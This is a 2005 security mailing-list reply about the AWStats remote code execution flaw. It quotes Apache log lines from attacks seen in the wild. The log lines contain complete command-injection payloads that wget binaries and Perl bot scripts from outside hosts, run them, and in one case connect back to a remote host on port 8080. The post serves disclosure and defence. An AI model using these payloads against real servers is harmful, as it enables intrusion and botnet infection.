[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050127014448.GI43576@snowcrash.tpb.net>
Date: Thu, 27 Jan 2005 02:44:49 +0100
From: Niels Bakker <niels-bugtraq@...ker.net>
To: Delian Krustev <krustev@...stev.net>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code
execution
* krustev@...stev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
It's been out there for a while already:
208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"
Those files don't exist there anymore.
-- Niels.
--
(please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for
the gazillion autoresponders of course)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists